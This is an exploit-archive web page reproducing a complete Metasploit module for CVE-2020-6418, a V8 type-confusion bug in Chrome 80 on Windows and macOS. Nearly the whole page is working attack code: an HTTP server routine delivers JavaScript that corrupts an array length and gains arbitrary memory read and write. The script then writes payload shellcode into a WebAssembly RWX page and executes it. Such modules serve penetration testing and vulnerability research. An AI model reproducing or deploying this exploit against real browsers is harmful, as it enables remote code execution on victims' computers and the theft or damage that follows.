Advertisement






Google Chrome 80 JSCreate Side-Effect Type Confusion

CVE Category Price Severity
CVE-2020-6418 CWE-119 Unknown High
Author Risk Exploitation Type Date
Pulik High Remote 2020-03-07
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030025

Below is a copy:

Google Chrome 80 JSCreate Side-Effect Type Confusion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Google Chrome 80 JSCreate side-effect type confusion exploit',
      'Description'    => %q{
      This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit
      corrupts the length of a float array (float_rel), which can then be used for out
      of bounds read and write on adjacent memory.
      The relative read and write is then used to modify a UInt64Array (uint64_aarw)
      which is used for read and writing from absolute memory.
      The exploit then uses WebAssembly in order to allocate a region of RWX memory,
      which is then replaced with the payload shellcode.
      The payload is executed within the sandboxed renderer process, so the browser
      must be run with the --no-sandbox option for the payload to work correctly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
          'Clment Lecigne', # discovery
          'Istvn Kurucsai', # exploit
          'Vignesh S Rao',   # exploit
          'timwr', # metasploit copypasta
        ],
      'References'     => [
          ['CVE', '2020-6418'],
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],
          ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],
          ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],
        ],
      'Arch'           => [ ARCH_X64 ],
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],
          ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],
        ],
      'DisclosureDate' => 'Feb 19 2020'))
    register_advanced_options([
      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
    ])
  end

  def on_request_uri(cli, request)
    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
      print_status("[*] #{request.body}")
      send_response(cli, '')
      return
    end

    print_status("Sending #{request.uri} to #{request['User-Agent']}")
    escaped_payload = Rex::Text.to_unescape(payload.raw)
    jscript = %Q^
var shellcode = unescape("#{escaped_payload}");

// HELPER FUNCTIONS
let conversion_buffer = new ArrayBuffer(8);
let float_view = new Float64Array(conversion_buffer);
let int_view = new BigUint64Array(conversion_buffer);
BigInt.prototype.hex = function() {
    return '0x' + this.toString(16);
};
BigInt.prototype.i2f = function() {
    int_view[0] = this;
    return float_view[0];
}
BigInt.prototype.smi2f = function() {
    int_view[0] = this << 32n;
    return float_view[0];
}
Number.prototype.f2i = function() {
    float_view[0] = this;
    return int_view[0];
}
Number.prototype.f2smi = function() {
    float_view[0] = this;
    return int_view[0] >> 32n;
}

Number.prototype.fhw = function() {
    float_view[0] = this;
    return int_view[0] >> 32n;
}

Number.prototype.flw = function() {
    float_view[0] = this;
    return int_view[0] & BigInt(2**32-1);
}

Number.prototype.i2f = function() {
    return BigInt(this).i2f();
}
Number.prototype.smi2f = function() {
    return BigInt(this).smi2f();
}

function hex(a) {
    return a.toString(16);
}

//
// EXPLOIT
//

// the number of holes here determines the OOB write offset
let vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];
var float_rel;      // float array, initially corruption target
var float_carw;     // float array, used for reads/writes within the compressed heap
var uint64_aarw;    // uint64 typed array, used for absolute reads/writes in the entire address space
var obj_leaker;     // used to implement addrof
vuln.pop();
vuln.pop();
vuln.pop();

function empty() {}

function f(nt) {
    // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug
    vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);
    for (var i = 0; i < 0x10000; ++i) {};
}

let p = new Proxy(Object, {
    get: function() {
        vuln[0] = {};
        float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];
        float_carw = [6.6];
        uint64_aarw = new BigUint64Array(4);
        obj_leaker = {
            a: float_rel,
            b: float_rel,
        };

        return Object.prototype;
    }
});

function main(o) {
  for (var i = 0; i < 0x10000; ++i) {};
  return f(o);
}

// reads 4 bytes from the compressed heap at the specified dword offset after float_rel
function crel_read4(offset) {
    var qw_offset = Math.floor(offset / 2);
    if (offset & 1 == 1) {
        return float_rel[qw_offset].fhw();
    } else {
        return float_rel[qw_offset].flw();
    }
}

// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel
function crel_write4(offset, val) {
    var qw_offset = Math.floor(offset / 2);
    // we are writing an 8-byte double under the hood
    // read out the other half and keep its value
    if (offset & 1 == 1) {
        temp = float_rel[qw_offset].flw();
        new_val = (val << 32n | temp).i2f();
        float_rel[qw_offset] = new_val;
    } else {
        temp = float_rel[qw_offset].fhw();
        new_val = (temp << 32n | val).i2f();
        float_rel[qw_offset] = new_val;
    }
}

const float_carw_elements_offset = 0x14;

function cabs_read4(caddr) {
    elements_addr = caddr - 8n | 1n;
    crel_write4(float_carw_elements_offset, elements_addr);
    print('cabs_read4: ' + hex(float_carw[0].f2i()));
    res = float_carw[0].flw();
    // TODO restore elements ptr
    return res;
}


// This function provides arbitrary within read the compressed heap
function cabs_read8(caddr) {
    elements_addr = caddr - 8n | 1n;
    crel_write4(float_carw_elements_offset, elements_addr);
    print('cabs_read8: ' + hex(float_carw[0].f2i()));
    res = float_carw[0].f2i();
    // TODO restore elements ptr
    return res;
}

// This function provides arbitrary write within the compressed heap
function cabs_write4(caddr, val) {
    elements_addr = caddr - 8n | 1n;

    temp = cabs_read4(caddr + 4n | 1n);
    print('cabs_write4 temp: '+ hex(temp));

    new_val = (temp << 32n | val).i2f();

    crel_write4(float_carw_elements_offset, elements_addr);
    print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));

    float_carw[0] = new_val;
    // TODO restore elements ptr
    return res;
}

const objleaker_offset = 0x41;
function addrof(o) {
    obj_leaker.b = o;
    addr = crel_read4(objleaker_offset) & BigInt(2**32-2);
    obj_leaker.b = {};
    return addr;
}

const uint64_externalptr_offset = 0x1b;     // in 8-bytes

// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array
function read8(addr) {
    faddr = addr.i2f();
    t1 = float_rel[uint64_externalptr_offset];
    t2 = float_rel[uint64_externalptr_offset + 1];
    float_rel[uint64_externalptr_offset] = faddr;
    float_rel[uint64_externalptr_offset + 1] = 0.0;

    val = uint64_aarw[0];

    float_rel[uint64_externalptr_offset] = t1;
    float_rel[uint64_externalptr_offset + 1] = t2;
    return val;
}

// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array
function write8(addr, val) {
    faddr = addr.i2f();
    t1 = float_rel[uint64_externalptr_offset];
    t2 = float_rel[uint64_externalptr_offset + 1];
    float_rel[uint64_externalptr_offset] = faddr;
    float_rel[uint64_externalptr_offset + 1] = 0.0;

    uint64_aarw[0] = val;

    float_rel[uint64_externalptr_offset] = t1;
    float_rel[uint64_externalptr_offset + 1] = t2;
    return val;
}

// Given an array of bigints, this will write all the elements to the address provided as argument
function writeShellcode(addr, sc) {
    faddr = addr.i2f();
    t1 = float_rel[uint64_externalptr_offset];
    t2 = float_rel[uint64_externalptr_offset + 1];
    float_rel[uint64_externalptr_offset - 1] = 10;
    float_rel[uint64_externalptr_offset] = faddr;
    float_rel[uint64_externalptr_offset + 1] = 0.0;

    for (var i = 0; i < sc.length; ++i) {
        uint64_aarw[i] = sc[i]
    }

    float_rel[uint64_externalptr_offset] = t1;
    float_rel[uint64_externalptr_offset + 1] = t2;
}


function get_compressed_rw() {

    for (var i = 0; i < 0x10000; ++i) {empty();}

    main(empty);
    main(empty);

    // Function would be jit compiled now.
    main(p);

    print(`Corrupted length of float_rel array = ${float_rel.length}`);
}

function get_arw() {
    get_compressed_rw();
    print('should be 0x2: ' + hex(crel_read4(0x15)));
    let previous_elements = crel_read4(0x14);
    //print(hex(previous_elements));
    //print(hex(cabs_read4(previous_elements)));
    //print(hex(cabs_read4(previous_elements + 4n)));
    cabs_write4(previous_elements, 0x66554433n);
    //print(hex(cabs_read4(previous_elements)));
    //print(hex(cabs_read4(previous_elements + 4n)));

    print('addrof(float_rel): ' + hex(addrof(float_rel)));
    uint64_aarw[0] = 0x4142434445464748n;
}

function rce() {
    function get_wasm_func() {
        var importObject = {
            imports: { imported_func: arg => print(arg) }
        };
        bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
        wasm_code = new Uint8Array(bc);
        wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
        return wasm_mod.exports.exported_func;
    }

    let wasm_func = get_wasm_func();
    //  traverse the JSFunction object chain to find the RWX WebAssembly code page
    let wasm_func_addr = addrof(wasm_func);
    let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;
    print('sfi: ' + hex(sfi));
    let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;
    print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));

    let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;
    print('instance: ' + hex(instance));

    let wasm_rwx_addr = cabs_read8(instance + 0x68n);
    print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));

    // write the shellcode to the RWX page
    while(shellcode.length % 4 != 0){
        shellcode += "\u9090";
    }

    let sc = [];

    // convert the shellcode to BigInt
    for (let i = 0; i < shellcode.length; i += 4) {
        sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));
    }

    writeShellcode(wasm_rwx_addr,sc);

    print('success');
    wasm_func();
}


function exp() {
    get_arw();
    rce();
}

exp();
^

    if datastore['DEBUG_EXPLOIT']
      debugjs = %Q^
print = function(arg) {
  var request = new XMLHttpRequest();
  request.open("POST", "/print", false);
  request.send("" + arg);
};
^
      jscript = "#{debugjs}#{jscript}"
    else
      jscript.gsub!(/\/\/.*$/, '') # strip comments
      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
    end

    html = %Q^
<html>
<head>
<script>
#{jscript}
</script>
</head>
<body>
</body>
</html>
    ^
    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
  end

end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum